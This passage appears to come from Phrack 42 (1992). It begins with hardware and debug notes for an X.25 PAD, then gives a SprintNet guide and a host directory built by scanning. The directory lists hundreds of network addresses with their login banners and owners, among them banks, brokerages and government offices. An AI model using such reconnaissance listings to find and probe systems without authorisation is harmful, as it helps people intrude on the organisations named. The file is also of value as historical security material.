- LCB+53 RECEIVE ACK COUNTER
- LCB+54 TRANSMIT ACK COUNTER
- LCB+55 CTS DROP-ERROR COUNTER
- LCB+56 DCD DROP-ERROR COUNTER
- LCB+5A CURRENT NO. WACK'S
-
-
- X780 LCB SPECIFIC INFORMATION
-
- LCB+4F CURRENT NO. OF SYNC PAIR INSERTIONS
- LCB+50 CURRENT NO. OF ERROR RETRIES
- LCB+51 CURRENT NO. OF NACK RETRIES
- LCB+52 CURRENT NO. OF ENQ RETRIES
- LCB+53 RECEIVE ACK COUNTER
- LCB+54 TRANSMIT ACK COUNTER
- LCB+55 CTS DROP-ERROR COUNTER
- LCB+56 DCD DROP-ERROR COUNTER
-
-
- COMMON DCB INFORMATION
-
- DCB+6 BITS 5-7 PACKET SEND SEQ. NO. P(S)
- DCB+7 BITS 5-7 PACKET REC. SEQ. NO. P(R)
- DCB+8 LCN #
- DCB+9 BITS 5-7 PACKET SEQ. NO. LAST CONFIRMED
- DCB+A BITS 5-7 PACKET SEQ. NO. LAST SENT TO NET
- DCB+B # PACKETS SENT
- DCB+D # PACKETS REC.
- DCB+F # RESETS SENT OR RECEIVED
- DCB+14 # BUFFERS IN HOLD QUEUE
- DCB+15 TIME VC WAS ESTABLISHED (SSMMHHDD)
- DCB+31 DESTINATION NETWORK ADDRESS
-
-
-
- THE FOLLOWING IS A DESCRIPTION OF THE TP3006 X.25 INTERFACE FROM THE
- SIO TO THE REAR PANEL CONNECTORS.
-
- SIO CHIP REAR PANEL CONNECTOR
- +--------------+
- | |
- | DTRB |------------------->- DTR 20
- | TXDB |------------------->- TXD 2
- | RTSA |------------------->- LDL 13
- | RTSB |------------------->- RTS 4
- | DTRA |------------------->- LAL 19
- | DCDA |---<-----------+--->- CTR 18
- | | +---<- RLSD 8
- | RXCA |--+
- | RXCB |--+-------- ** ----<- RXC 17
- | | +->- TXCE 24
- | | ** --+->- RXCE 11
- | TXCA |----+
- | TXCB |----+------ ** ----<- TXC 15
- | DCDB |----------- ** ----<- DSR 6
- | CTSB |-------------------<- CTS 5
- | RXDA |----+
- | RXDB |----+--------------<- RXD 3
- | CTSA |-------------------<- RI 22
- | |
- +--------------+
-
- < INBOUND SIGNAL
- > OUT BOUND SIGNAL
-
- IF DSR AND TXC, THEN USE EXTERNAL CLOCKING. IF DSR AND NO TXC,
- THEN USE INTERNAL CLOCKING DERIVED FROM THE CONFIGURED LINE SPEED
- PRODUCED FROM A CTC CHIP). IF THE CLOCKING IS PRODUCED INTERNALLY,
- THEN THE INTERNAL CLOCK IS ALSO PROVIDED ON PINS 11 AND 24
- AT THE REAR PANEL.
-
- FOR THE TP3325, THE NETLINES ALWAYS USE THE EXTERNAL CLOCK SOURCE.
- THE HARDWARE WAS CHANGED DURING REFINEMENT OF THE MOD ONE XPB.
-
- IF THE ATTACHED DEVICE IS PROVIDING CLOCKING AND THE TP3025 IS PROVIDING
- CLOCKING, THE TP WILL DETECT THE CLOCKING AND WILL STOP CLOCKING. IN THE
- CASE OF THE TP3025 HAVING BEEN RESET AND LOADED, IF A TP3005/3006 IS THEN
- CONNECTED TO THE INTERFACE, THERE IS A RACE CONDITION WHERE THE DEVICE THAT
- PROVIDES THE CLOCKING IS ARBITRARY. THE HARDWARE LOGIC REQUIRES A RESET
- TO OCCUR FOR THE TP3025 TO CHANGE PRIOR SELECTION OF 1) INTERNAL/EXTERNAL
- CLOCKING AND 2) V35/RS232 INTERFACE AFTER A LOAD.
-
- THE DEBUG PORT "S" COMMAND WILL RETURN ONE HEX BYTE THAT REPRESENTS
- THE DATA SET SIGNALS STATUS AT THE SIO CHIP FOR THE DEFINED LINE
- (E.G. "S2" WILL RETURN THE DATA SET SIGNALS ON LINE 2). THE UPPER HALF
- OF THE BYTE IS USED TO REPRESENT THE DATA SET SIGNAL STATUS.
-
- BIT 7 6 5 4 3 2 1 0
- | | | | ==========
- | | | | NOT USED
- | | | |
- DSR AT THE REAR ---+ | | +--- RTS AT THE REAR PANEL.
- DTR AT THE REAR -----+ +------ CTS AT THE REAR PANEL.
-
- THE FOLLOWING IS A DESCRIPTION OF THE DEVICE INTERFACE FOR THE
- SIO TO THE REAR PANEL.
-
- SIO CHIP REAR PANEL INTERFACE
- +--------------+
- | |
- | RXD | ------------------------< 2 TD
- | TXD | ------------------------> 3 RD
- | DCD | -<-----------+----------< 4 RTS
- | | +----------> 5 CTS
- | DTR | ------------------------> 6 DSR
- | RTS | ------------------------> 8 DCD
- | RXC | -<--------- ** ---------< 11
- | | PIO DSR -- ** ---------< 20 DTR
- | | -- ** ---------> 15 TC
- | | -- ** --------> 17 RC
- | TXC | -<--------- ** ---------< 24 TC
- | CTS | -<----------------------< 18
- | |
- | | PIO -----------------< 25
- | | PIO -----------------> 22
- | |
- +--------------+
-
- WITH DTR TRUE ( PIN 20), RXC (PIN 11) IS CHECKED FOR AN INBOUND CLOCK
- SIGNAL. IF THERE IS A CLOCK SIGNAL, THEN THE SIO IS CLOCKED EXTERNALLY
- FROM PIN 11 AND 24. IF THERE IS NO CLOCK ON PIN 11 THEN AN INTERNAL CLOCK
- SOURCE IS GATED TO THE SIO AND TO PIN 15 AND 17 ON THE REAR PANEL INTERFACE.
-
- THE OUTPUT OF THE DEBUG PORT 'S' COMMAND DISPLAYS ONE HEX BYTE THAT
- IS A COMPOSITE OF THE DATA SET SIGNALS FROM THE PIO AND SIO CHIPS. THE
- OUTPUT BIT DEFINITIONS ARE THE SAME AS THE X.25 LINE BUT A NOTE NEEDS
- TO MADE THAT THE X.25 IS A DTE INTERFACE AND THE DEVICE LINES ARE A
- DCE INTERFACE. THE UTILIZATION OF THE INBOUND RTS/CTS MAY NOT BE
- REQUIRED FOR THE TP TO MAINTAIN THE INTERFACE.
-
- PINS 22 AND 25 ARE PAD DEPENDANT SO THEY MAY BE USED FOR
- DIFFERENT FUNCTIONS THAN THOSE EXPECTED.
-
- ALL NUMERIC VALUES ARE IN HEX.
- COMMAND STRINGS CAN BE USED WHILE IN THE DEBUG PORT.
-
- ==============================================================<
- | XCB DIRECTORY TABLE (two bytes per entry) >
- | DEBUG |LOGGER| X.25 #0 | X.25 #1 | X.25 #2 | X.25 #3|.......
- L70,R24 | DCB | DCB | XCB | XCB | XCB | XCB | >
- |===============================================================>
- | | | | | |
- XCB#0 XCB#1 | XCB#2 XCB#3 | XCB#4 XCB#5
- | | | | | |
- +->>---------------->>-+ | | +>>+ | |
- | | | | | |
- | +<<----------------<<-+ L76,R2 | | L7A,R2
- | | | |
- | | L74,L,R80 | +<<---+ L78,L,R80
- | | | |
- | +------------->>--------------> | +--------->>------------->
- | | XCB >> > | | XCB >> >
- | +------------->>--------------> | +--------->>------------->
- | | XCB+2D | | XCB+2D
- | | +>>+ |
- | +-<<---------------+ | +-<<-------------+
- | | | |
- | | L(XCB+2D),L,R((MAX.LCN*3)+3) | | L(XCB+2D),L,R((MAX.LCN*3)+3)
- | | | |
- | +------------------>>--------> | +------------------>>-------->
- | | LCN VECTOR TABLE >> ABCCDD > | | LCN VECTOR TABLE >> ABCCDD >
- B |3 BYTES PER ENTRY >> ====== > B |3 BYTES PER ENTRY >> ====== >
- | +------------------>>--------> | +------------------>>-------->
- | | | |
- +--CC->> TRUNK LCNS -----> | +--CC->> CONCENTRATOR LCNS |
- | |LCN0 |LCN1 |... | | |LCN0 |LCN1 |... |
- | +--->>--+ |
- | |
- | THREE BYTE LCN ENTRY ==> AB CC DD |
- | = == == |
- | | | | |
- | XCB NUMBER ----+ | | |
- | LCN NUMBER ------+ +---- LCN TIMER |
- | |
- | |
- +-<<-----------------------------------------------------<<-------+
-
- ** CC IS THE LCN NUMBER IN XCB B. B IN XCB #0 WILL POINT TO
- == = =
- XCB #4 IN THIS EXAMPLE. CC IN XCB #0 WILL GIVE THE LCN NUMBER USED IN
- ==
- THE LCN VECTOR TABLES FOR XCB #4.
-
-
- 1) XCB OFFSETS DEFINITION
-
- XCB + 09 CONTROL DATA SET SIGNAL STATUS
- BIT 4 = 1 RTS HIGH
- 5 = 1 CTS HIGH
- 6 = 1 DTR HIGH
- 7 = 1 DSR HIGH
- THE S COMMAND RETRIEVES THIS LOC.
- XCB + 0B POINTER TO LINE CONFIGURATION RECORD.
-
- XCB + 0E NUMBER OF FRAMES DISCARDED.
- XCB + 0F NUMBER OF CRC ERRORS
-
- XCB + 10 NUMBER OF REJECTS SENT
- XCB + 11 NUMBER OF REJECTS RECEIVED
-
- XCB + 12 NUMBER OF T1 TIMEOUT
-
- XCB + 13 NUMBER OF COMMAND REJECTS SENT
- XCB + 14 NUMBER OF COMMAND REJECTS RECEIVED
-
- XCB + 15 NUMBER OF DISCONNECTS SENT
- XCB + 16 NUMBER OF DISCONNECTS RECEIVED
-
- XCB + 17 NUMBER OF SET MODE SENT
- XCB + 18 NUMBER OF SET MODE RECEIVED
-
- XCB + 19 NUMBER OF FRAME OVERFLOW
-
- XCB + 1A NUMBER OF I FRAMES SENT
- XCB + 1C NUMBER OF I FRAMES RECEIVED
-
- XCB + 24 FLAG BYTE
- BIT 0 = 1 DCE-TO-DTE FLOW INIT
- 1 = 1 DTE-TO-DCE FLOW INIT
- 2 = 1 LINK RESET (DISC. OR SETMODE SENT
- 3 = 1 DCE BUSY ( RNR SENT)
- 4 = 1 IN TIMER RECOVERY
- 5 = 1 SENT INTERNAL RESET. LAP RE-INIT.
- 6 = 1 SET POLL BIT IN NEXT FRAME.
-
- XCB + 27 LINE STATUS
- BIT 0 = 1 NOT ACTIVE
- 1 = 1 DEACTIVATED
- 2 = 1 BUSY-OUT
- 3 = 1 ACTIVATING
- 4 = 1 ACTIVE
- 5 = 1 DEACTIVATING
-
- XCB + 2B MAX. LCN PERMITTED
- XCB + 2C CURRENT NUMBER OF LCN IN USE
- XCB + 2D POINTER TO THE LCN VECTOR TABLE
-
- XCB + 47 'DISABLE/ ENABLE/ CLEAR COMMAND.
- NOT OPERATIONAL AT VERSION 1.01.
- 01 - BUSY
- 02 - CLEAR BUSY
- 04 - RESET LINE
-
- 2) LCN VECTOR TABLE.
- ( XCB + 2D ,L,A (LCN ADDRESS),R3)
- LCN ADDRESS = (LCN * 3)
-
- LCN + 0 BITS
- 0-3 - XCB DIRECTORY NUMBER.
- 4 - INIT CLEAR TIMER ON
- 5 - CLEAR INDICATION SENT
- 6 - CALL REQUEST SENT
- 7 - LCN ACTIVE
- LCN + 1 LCN NUMBER
- (SEE LCN + 0 , BITS 0-3 TO GET XCB NUMBER)
- LCN + 2 TIMER FOR LCN.
-
-
-
-
- ==Phrack Magazine==
-
- Volume Four, Issue Forty-Two, File 8 of 14
-
- The SprintNet/Telenet Directory
-
- ===
- =======
- ===========
- ===============
- ---------------------===========
- ------------------=============
- ---------------=================
- ------------===================
- ===============
- ===========
- =======
- ===
-
-
-
- Scanned and written by Skylar
- Release date: 12/92
-
- Part I Basic SprintNet Info
- Part II SprintNet Directory
-
-
-
-
- How to Access SprintNet:
- ~~~~~~~~~~~~~~~~~~~~~~~~
- (Compliments of Sprint)
-
-
- SPRINTNET LOCAL ACCESS NUMBERS
-
- FOR THE MOST UP-TO-DATE LISTING OF THE U.S. ACCESS TELEPHONE NUMBERS
- FOR PC OUTDIAL SERVICES, DO THE FOLLOWING:
-
- 1. USE A MODEM TO DIAL 1-800-546-1000 WITH PARAMETERS SET AT 7-E-1
-
- 2. TYPE THREE CARRIAGE RETURNS (CR) (CR) (CR)
-
- 3. INPUT YOUR AREA CODE AND LOCAL EXCHANGE
-
- 4. YOU WILL THEN RECEIVE THE PROMPT SIGN "@"
-
- 5. THEN, TYPE:
- MAIL (CR)
- USER NAME: PHONES (CR)
- PASSWORD: PHONES (CR)
-
- Follow the menus to get your local dialup, then logon through that using the
- same procedure until you get to the "@" prompt. From here, you can type in
- commands. Below is a list of commands available from the "@" prompt.
-
- Notes: while connected, you can escape to the command prompt by sending
- <cr>@<cr>
- while waiting for a connection, you can escape to the command prompt by
- sending a hard BREAK
-
- Command <parameter> Explanation
-
- BYE Closes session (same as disconnect)
- CONNECT <nua> Connects to a network user address
- CONTINUE Continue session (used after breaking)
- DISCONNECT Closes session (same as bye)
- DTAPE Builds optimum circuit for bulk file transfer
- DISABLE ECHO
- DISABLE FLOW Pad to host flow control
- DISABLE TFLOW Terminal to pad flow control
- ENABLE ECHO
- ENABLE FLOW
- ENABLE TFLOW
- FULL Set full duplex
- HALF Set half duplex
- HANGUP Self explanitory
- ID <nui> Sets the network user id for charged calls
- RESET Resets your port (as if you just dialed up)
- RST Show remote parameters
- RST? Set remote parameters
- PAR? Show ITI parameters
- STATUS Shows your current network address and port
- SET? <param>:<value> Set ITI parameters.
- TERM <termtype> Set your termtype
- TEST CHAR Test of all ascii characters
- TEST ECHO Echos what you type
- TEST TRIANGLE
- TEST VERSION Shows current pad software ver
-
- Note: I didn't include any of the parameters for SET? or termtypes because
- they would have increased the length of this file by about 20%. If you
- want these, you can get them from the PC-PURSUIT BBS file section via
- C PURSUIT from SprintNet or 031109090063100 international.
-
-
-
- Network Messages:
- ~~~~~~~~~~~~~~~~~
- While attempting to CONNECT to addresses on SprintNet, you may run into various
- messages from the network. This should help you determine what they mean.
-
-
- If you are connected and break your connection or are disconnected by the
- remote host, you will recieve a disconnect message. Below is a breakdown of
- the message.
-
- DISCONNECTED 00 00 00:00:00:00 000 00
- ^ ^ ^_________^ ^ ^
- | | | | |
- | | | | +-- Packets sent
- | | | +----- Packets recieved
- | | +------------- Days:Hours:Minutes:Seconds connected
- | +--------------------- Clearing diagnostic code
- +------------------------ Clearing cause code
-
-
- If you are unable to make a connection or abort an attempted connection, you
- will only receive cause and diagnostic codes (as no time was spent connected
- and obviously no packets were sent!) along with a very general plain-text of
- what the problem might be (i.e. rejecting, not operating...). Below is a list
- of cause and diagnostic codes to give you a more detailed idea of why you were
- unable to connect or why you were disconnected.
-
-
- Clear cause codes:
-
- 0 "DTE originated clear"
- 1 "Number busy"
- 3 "Invalid facility requested"
- 5 "Network congestion"
- 9 "Out of Order"
- 11 "Access barred"
- 13 "Not obtainable"
- 17 "Remote Procedure Error"
- 19 "Local Procedure error"
- 21 "RPOA out of order"
- 25 "Reverse Charge not Subscribed to"
- 33 "Incompatible destination"
- 41 "Fast Select acceptance not subscribed"
- 49 "Ship absent"
- 128 "DTE originated clear with top bit set"
- 193 "Gateway procedural error"
- 195 "Gateway congestion"
- 199 "Gateway Operational"
-
-
- Clear diagnostic codes
-
- 0 "No additional Information"
- 1 "Invalid Ps"
- 2 "Invalid Pr"
- 16 "Packet Type Invalid"
- 17 "Packet Type Invalid in state r1"
- 18 "Packet Type Invalid in state r2"
- 19 "Packet Type Invalid in state r3"
- 20 "Packet Type Invalid in state p1"
- 21 "Packet Type Invalid in state p2"
- 22 "Packet Type Invalid in state p3"
- 23 "Packet Type Invalid in state p4"
- 24 "Packet Type Invalid in state p5"
- 25 "Packet Type Invalid in state p6"
- 26 "Packet Type Invalid in state p7"
- 27 "Packet Type Invalid in state d1"
- 28 "Packet Type Invalid in state d2"
- 29 "Packet Type Invalid in state d3"
- 32 "Packet not allowed"
- 33 "Packet Type Unidentifiable"
- 34 "Call on One way LC"
- 35 "Invalid PVC packet type"
- 36 "Packet on Unassigned logical channel"
- 37 "Reject not Subscribed to"
- 38 "Packet too short"
- 39 "Packet too long"
- 40 "Invalid GFI"
- 41 "Restart/Registration Packet has LC"
- 42 "Packet type not compatible with Facility"
- 43 "Unauthorised Interrupt Confirmation"
- 44 "Unauthorised Interrupt"
- 45 "Unauthorised Reject"
- 48 "Timer expired"
- 49 "Timer expired for Incoming call"
- 50 "Timer expired for clear Indication"
- 51 "Timer expired for reset indication"
- 52 "Timer expired for restart indication"
- 53 "Timer expired for call forwarding"
- 64 "Call set up/clear/registration problem"
- 65 "Facility/registration code not allowed"
- 66 "Facility parameter not allowed"
- 67 "Invalid Called Address"
- 68 "Invalid calling address"
- 69 "Invalid facility registration length"
- 70 "Incoming call barred"
- 71 "No logical channel available"
- 72 "Call Collision"
- 73 "Duplicate facility ested"
- 74 "Non zero address length"
- 75 "Non zero facility length"
- 76 "Facility not provided when expected"
- 77 "Invalid CCITT spec'd facility"
- 78 "Maximum call redirections/forwardings exceeded"
- 80 "Miscellaneous"
- 81 "Improper cause code from DTE"
- 82 "Non alligned octet"
- 83 "Inconsistent Q bit setting"
- 84 "NUI Related problem"
- 96 "International setup/clearing problem"
- 97 "Unknown calling DNIC "
- 98 "TNIC mismatch "
- 99 "Call identifier mismatch"
- 100 "Neg' error in utility parm' value"
- 101 "Invalid utility length "
- 102 "Non-zero utility length "
- 103 "M bit violation "
- 112 "International problem "
- 113 "Remote Network problem "
- 114 "International Protocol problem "
- 115 "International Link out of order "
- 116 "International Link busy"
- 117 "Transit Network Facility Problem"
- 118 "Remote Network Facility Problem"
- 119 "International routing problem"
- 120 "Temporary routing problem"
- 121 "Unknown called DNIC"
- 122 "MAintenance action"
- 128 "Network Specific Diagnostic"
- 218 "trax_trap error for user call"
- 219 "user task error"
- 220 "x25 task error"
-
-
- Note: If you're getting LOCAL/REMOTE PROCEDURE ERROR or REJECTING, try using
- different ports with the same address.
-
-
- Other Than SprintNet:
- ~~~~~~~~~~~~~~~~~~~~~
- International or other than SprintNet users, follow the table below to expand
- these addresses to suit your network:
-
- 202 224 <--- Address from list
-
- 031102020022400 <--- Translated to international format
-
-
- 03110 202 00224 00 <--- Explanation of international format
- ^^^^^ ^^^ ^^^^^ ^^
- | | | |
- | | | |____ Port Number
- | | |_________ Network Address
- | |______________ Network Prefix
- |___________________ DNIC
-
-
-
- DNIC : This will be be 03110 for all translations. On some networks, you
- won't need the leading 0 and can use 3110, and a few networks
- (DataPac?) use a 1 instead of 0, thus: 13110.
-
-
- Prefix : Throughout this file, it will always be a three digit prefix.
-
-
- Address: You may have to experiment a little to get the correct place holders,
- but as a general rule they will translate like this:
-
- 1 = 00001
- 11 = 00011
- 111 = 00111
- 1111 = 01111
- 11111 = 11111
-
-
- Ports : Port numbers range from .1 to .99. The first 27 ports may be
- alternately displayed as A-Z. Ports are generally not listed as most
- addresses will find a free port for you if you leave it off, but in
- some cases you must use it, so they translate like this:
-
- .1 or A = 01
- .2 or B = 02
- and so on...
-
-
-
- Examples of translated addresses:
-
- 201 1.5 = 031102010000105
- 415 9 = 031104150000900
- 223 25 = 031102230002500
- 714 218 = 031107140021800
- 617 2027 = 031106170202700
-
-
- If this seems a bit essoteric or confusing, don't worry. A little bit of
- experimenting will get you on the right track.
-
-
- Notes:
- ~~~~~~
- - You can usually omit leading and trailing 0's
- - Most networks and PADs do NOT allow any spaces
- - From SprintNet, you can use either form of address
-
-
-
- Conventions in this list:
- ~~~~~~~~~~~~~~~~~~~~~~~~~
- Addresses followed by a "$" do not accept collect connections (if you're not
- coming on from SprintNet, ignore the $).
-
- Addresses followed by a "*" do not accept collect connections, and I was unable
- to connect to them to determine what they are.
-
- When both the OS and the RESPONSE fields are left blank, this means that I
- connected and either couldn't evoke response or got a garbage response.
-
- LOGIN/PW's removed from this release.
-
-
-
- SprintNet Directory
- ~~~~~~~~~~~~~~~~~~~
-
- 201 - New Jersey Scanned:[0-2000]
-
- ADDRESS OS/SYSTEM PROMPT/RESPONSE/OWNER/ETC LOGIN/PW
- ---------- ----------- -------------------------------------------------
- 201 1 $ outdial (201)
- 201 22 $ outdial (201)
- 201 25 Unix HP-UX ciathp A.B7.00 U 9000/835
- 201 30
- 201 32 D&B Terminal
- 201 34 $ Prime
- 201 36 * (incoming call barred)
- 201 37 $
- 201 40 $ Welcome to our PSI via X.29
- 201 42 *
- 201 43 $
- 201 44 $
- 201 45 Prime NewsNet
- 201 46 $
- 201 48 $ VAX/VMS Welcome to MicroVMS V5.3
- 201 49 $ VAX/VMS
- 201 53 WELCOME TO COLGATE'S IICS
- 201 57 * (incoming call barred)
- 201 58 * (incoming call barred)
- 201 59 * (incoming call barred)
- 201 66 $ Prime
- 201 67 warner computer systems
- 201 68 warner computer systems
- 201 69 warner computer systems
- 201 83 ENTER ID:
- 201 84 D&B Terminal
- 201 86 D&B Terminal
- 201 88 D&B Terminal
- 201 89 Prudential
- 201 107 $ outdial (201)
- 201 108 $ outdial (201)
- 201 138 HP-3000 EXPECTED HELLO, :JOB, :DATA, OR (CMD) AS LOGON.
- 201 140 $ Enter One Time Password:
- 201 156 Unix Securities Data Company (SDC7)
- 201 163 VU/TEXT * PLEASE SIGN ON:
- 201 164 VU/TEXT * PLEASE SIGN ON:
- 201 167 DTC DTC01.HP.COM
- 201 170 Prudential
- 201 173 MHP201A UPK19130 APPLICATION:
- 201 174 CRYPTO ENTER "IDX" OR "ID" AND USER ID -->
- 201 179 APPLICATION:
- 201 200 D&B Terminal
- 201 201 D&B Terminal
- 201 235 *
- 201 241 $ (immediate hangup)
- 201 242 D&B Terminal
- 201 243 D&B Terminal
- 201 244 D&B Terminal
- 201 246 D&B Terminal
- 201 247 VTAM Shearson Lehman Brothers NPSI
- 201 252 Prime PRIMENET 21.0.6 BOR
- 201 254 $ Unix field login:
- 201 257 Please press <Return> . . .(
- 201 259 Please press <Return> . . .(
- 201 271 $ User Access Verification Password:
- 201 301 $ outdial
- 201 334 $ HP-3000 :
- 201 335 *
- 201 336 $ Concurrent Computer Corporation's DATALINK
- 201 337 $ out of order
- 201 339 $ ??? (echo)
- 201 340 *
- 201 341 *
- 201 342 $ Unix ocpt
- 201 343 $ Enviornmental Control Monitor (PENNET)
- 201 344 *
- 201 348 *
- 201 350 $ $$ 4200 MODEL: $$ 50 DEVICE TYPE IDENTIFIER :
- 201 355 $ Concurrent Computer Corporation's DATALINK
- 201 430 * (incoming call barred)
- 201 465 VAX/VMS V5.5 on VBH301
- 201 471 Prudential
- 201 472 APPLICATION:
- 201 474 Prudential
- 201 475 Prudential
- 201 477 VM/CMS? ENTER AS SHOWN: L/LOGON/TSO/INFO/CICS
- 201 479 VM/CMS
- 201 730 *
- 201 770 *
- 201 830 $ INSCI/90 SYSTEM MV-10/13, LOGON PLEASE
- 201 870 $ INSCI/90 SYSTEM MV-10/13, LOGON PLEASE
- 201 890 $ INSCI/90 SYSTEM MV-10/13, LOGON PLEASE
- 201 895 $ INSCI/90 SYSTEM MV-10/10, LOGON PLEASE
- 201 899 $ (hangs up)
- 201 910 $ (echo)
- 201 912 $ (echo)
- 201 914 $ (echo)
- 201 916 $ (echo)
- 201 950 Bankers Trust Online
- 201 999 $ (hangs up)
- 201 1030 USER ID
- 201 1050 VU/TEXT
- 201 1051 VU/TEXT
- 201 1052 VU/TEXT
- 201 1053 VU/TEXT
- 201 1054 VU/TEXT
- 201 1055 VU/TEXT
- 201 1056 VU/TEXT
- 201 1057 VU/TEXT
- 201 1059 VU/TEXT
- 201 1060 VU/TEXT
- 201 1061 VU/TEXT
- 201 1062 VU/TEXT
- 201 1063 VU/TEXT
- 201 1064 VU/TEXT
- 201 1065 VU/TEXT
- 201 1066 VU/TEXT
- 201 1067 VU/TEXT
- 201 1068 VU/TEXT
- 201 1069 VU/TEXT
- 201 1070 VU/TEXT
- 201 1071 VU/TEXT
- 201 1072 VU/TEXT
- 201 1073 VU/TEXT
- 201 1074 VU/TEXT
- 201 1075 VU/TEXT
- 201 1076 VU/TEXT
- 201 1077 VU/TEXT
- 201 1078 VU/TEXT
- 201 1079 VU/TEXT
- 201 1135 $ ACCESS BARRED
- 201 1137 $ Finlay Fine Jewelry Corp.
- 201 1139 CONNECTED TO PACKET/400
- 201 1143 $ MHP201A UPK19040 APPLICATION:
- 201 1156 *
- 201 1160 Shaw Data Services
- 201 1163 * (incoming call barred)
- 201 1164 * (incoming call barred)
- 201 1168 CONNECTED TO PACKET/400
- 201 1170.1 $ Johnson and Johnson Network
- 201 1171 *
- 201 1172 $ Unix/SCO TCSS
- 201 1173 *
- 201 1174 *
- 201 1176 NSP READY
- 201 1177 NSP READY
- 201 1232 VAX/VMS Username:
- 201 1233 VAX/VMS Username:
- 201 1243 VAX/VMS Friden Neopost (NJCRAN Node)
- 201 1251 VM/CMS GSERV
- 201 1258 VM/CMS GSERV
- 201 1259 VM/CMS GSERV
- 201 1263 * (incoming call barred)
- 201 1264 * (incoming call barred)
- 201 1265 *
- 201 1266 *
- 201 1267 *
- 201 1268 *
- 201 1270
- 201 1272
- 201 1275 VAX/VMS Shaw Data Services
- 201 1277
- 201 1330 *
- 201 1331 *
- 201 1332 *
- 201 1333 $ (echo)
- 201 1335 $ Environment Control Monitor
- 201 1340 *
- 201 1341 *
- 201 1342 *
- 201 1343 Prudential
- 201 1344 Prudential
- 201 1345 Prudential
- 201 1346 Prudential
- 201 1347 Prudential
- 201 1354 *
- 201 1359 $ Finlay Fine Jewelry Corp.
- 201 1370.1 $ HP-3000 CORPHP.CIS.HCC
- 201 1371 *
- 201 1372 *
- 201 1373 *
- 201 1374 *
- 201 1375 *
- 201 1376 *
- 201 1377 *
- 201 1378 *
- 201 1379 $
- 201 1430 * (incoming call barred)
- 201 1431 * (incoming call barred)
- 201 1432 * (incoming call barred)
- 201 1433 * (incoming call barred)
- 201 1434 * (incoming call barred)
- 201 1435 * (incoming call barred)
- 201 1442 *
- 201 1443 *
- 201 1446 *
- 201 1454 *
- 201 1455 *
- 201 1456 *
- 201 1460
- 201 1510
- 201 2030 Lynx Technologies Inc.
- 201 2031 VTAM Shearson Lehman Brothers NPSI
- 201 11234 VAX/VMS
-
-
-
- 202 - Washington D.C. Scanned: [0 - 3000] & various
-
- ADDRESS OS/SYSTEM PROMPT/RESPONSE/OWNER/ETC LOGIN/PW
- ---------- ----------- -------------------------------------------------
- 202 1 Prime
- 202 2 Prime
- 202 10 Prime
- 202 12 Prime
- 202 31 NewsMachine 5.1
- 202 36 $ NETWORK SIGN-ON FAILED
- 202 38 $ NETWORK SIGN-ON FAILED
- 202 42 *
- 202 48 $ U.S.I.A. Computer Center.
- 202 49 enter system id --
- 202 115 $ outdial (202)
- 202 116 $ outdial (202)
- 202 117 $ outdial (202)
- 202 123 $ xxxx
- 202 138 $ VAX/VMS Gaullaudet University
- 202 141 >909 761 User name?
- 202 142 >909 406 User name?
- 202 149 $
- 202 150 UPI>
- 202 152 *
- 202 201 CompuServe User ID: phones
- 202 202 CompuServe
- 202 203 CompuServe
- 202 224 $ outdial (global)
- 202 235 $ Prime
- 202 239 $ Prime
- 202 241 *
- 202 243 *
- 202 245 AOS Username:
- 202 253 *
- 202 255 Morgan Stanley Network
- 202 260 $ PLEASE SELECT: TSOMVS, ANOTHER APPLICATION
- 202 265 $ USER ID
- 202 266 $ USER ID
- 202 275 *
- 202 276 *
- 202 277 *
- 202 278 $ USER ID
- 202 330 *
- 202 331 *
- 202 332 *
- 202 333 *
- 202 334 *
- 202 335 *
- 202 336 VAX/VMS Congressional Quarterly Online Systems
- 202 337 VAX/VMS Congressional Quarterly Online Systems
- 202 353 *
- 202 356 PRIME PRIMENET 22.1.1.R36 SYSA
- 202 361 *
- 202 362 *
- 202 363 *
- 202 364 *
- 202 365 Lexis and Nexis
- 202 366 Lexis and Nexis
- 202 367 Lexis and Nexis
- 202 371 *
- 202 372 *
- 202 373 *
- 202 377 *
- 202 390 $ #CONNECT REQUESTED TO HOST GSAHOST : CANDE
- 202 391 $ #CONNECT REQUESTED TO HOST GSAHOST : CANDE
- 202 403 $ outdial (202)
- 202 433 *
- 202 453 USER ID
- 202 454 VAX/VMS Connect to GBS
- 202 455 *
- 202 456 *
- 202 458 *
- 202 459 *
- 202 465 *
- 202 466 *
- 202 467 *
- 202 468 *
- 202 469 *
- 202 472 *
- 202 477 UPI>
- 202 478 UPI>
- 202 479 UPI>
- 202 550 UPI>
- 202 616 *
- 202 617 *
- 202 1030 *
- 202 1031 *
- 202 1032 *
- 202 1033 *
- 202 1034 *
- 202 1155 *
- 202 1156 *
- 202 1157 *
- 202 1158 *
- 202 1159 *
- 202 1261 *
- 202 1262 *
- 202 1263 *
- 202 1264 *
- 202 1265 *
- 202 1266 *
- 202 1267 *
- 202 1268 *
- 202 1269 *
- 202 1270 *
- 202 1323 $
- 202 1325 VAX/VMS
- 202 1363 Enter your User Name:
- 202 1364.1 Unix System name: fmis
- 202 1365.3 Unix/SysV X.29 Terminal Service (person)
- 202 1385 Prime PRIMENET 22.1.3 CGYARD
- 202 1407 Unix/SysV X.29 Terminal Service (person)
- 202 1440 VAX/VMS Username:
- 202 3011 *
- 202 3012 *
- 202 3030A ASYNC TO 3270 -> FIRST AMERICAN BANK OF GEORGIA
- 202 3036 $ GS/1 GS/X.25 Gateway Server
- 202 3060 *
- 202 3067 $ Major BBS Power Exchange (adult bbs and chat) Member-ID? new
- 202 3069 $ E06A26B3
- 202 3070 $
- 202 3071 $
- 202 3072 $
- 202 3074 $ VAX/VMS Welcome to VAX/VMS V5.5-1
- 202 3075 *
- 202 3130 GTE Contel DUAT System (login as visitor)
- 202 3131 GTE Contel DUAT System (airplane info galore)
- 202 3134 USER ID
- 202 3135 USER ID
- 202 3138 *
- 202 3139 *
- 202 3140 *
- 202 3142 *
- 202 3145 &StArT&
- 202 3242 VOS Please login (try 'help')
- 202 3243 VOS Please login
- 202 3244 Unix tmn!login:
- 202 3246 *
- 202 3247 *
- 202 3254 VOS Please login
- 202 3255 VOS Please login
- 202 3256 VOS Please login
- 202 3257 (locks up)
- 202 3258 VOS Please login
- 202 3259 VOS Please login
- 202 3260 VOS Please login
- 202 3261 VOS Please login
- 202 3262 VOS Please login
- 202 3263 VOS Please login
- 202 3264 $ AMS SYSTEM=
- 202 3269
- 202 3330 *
- 202 3332 *
- 202 3333 *
- 202 3335 $ NETX A000VD00 READY FOR LOGON
- 202 3336 $ NETX A000VD00 READY FOR LOGON
- 202 3337 *
- 202 3338 *
- 202 3600 *
- 202 3601 *
- 202 3602 *
